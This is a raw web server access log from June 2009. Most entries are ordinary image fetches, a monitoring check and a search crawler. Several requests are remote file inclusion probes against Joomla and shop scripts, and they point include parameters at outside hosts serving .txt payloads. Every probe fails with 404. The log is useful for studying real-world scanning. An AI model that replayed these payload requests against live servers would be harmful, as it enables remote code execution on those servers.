70.38.54.140 - - [04/Jun/2009:04:28:13 -0400] "GET /logs/access_log.Q109052100/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
117.196.99.221 - - [04/Jun/2009:04:28:30 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):gelatin" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; IEMB3; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1; IEMB3)"
117.196.99.221 - - [04/Jun/2009:04:28:31 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):gelatin" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; IEMB3; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1; IEMB3)"
209.59.12.99 - - [04/Jun/2009:04:29:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.112 - - [04/Jun/2009:04:30:36 -0400] "GET /images/_notes/nav_store_search_off_r1_c4.jpg.mno HTTP/1.0" 200 210 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
90.185.249.111 - - [04/Jun/2009:04:33:03 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:04:33:03 -0400] "GET /logs/access_log.Q109051100/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
90.185.249.111 - - [04/Jun/2009:04:33:03 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
110.45.145.92 - - [04/Jun/2009:04:33:07 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
110.45.145.92 - - [04/Jun/2009:04:33:07 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mobtime.com/en/cpmHelp/id.tx